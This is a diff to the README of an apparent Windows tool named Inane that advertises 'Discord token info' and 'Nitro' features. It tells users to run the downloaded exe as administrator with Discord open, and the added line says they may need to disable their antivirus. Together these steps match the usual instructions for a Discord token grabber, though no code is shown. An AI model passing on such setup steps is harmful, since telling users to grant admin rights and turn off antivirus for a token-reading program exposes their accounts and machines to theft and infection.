Arden803/Inane/README.md

 ## 🛠️ Usage Guide
 Download the zip file and extract it, run Inane.exe **as admnistrator**.
 If it doesnt work try opening the discord app and re running.
+⚠️ You may have to disable your antivirus.

 ## ✨ Features
 -   Discord token info
     -   Nitro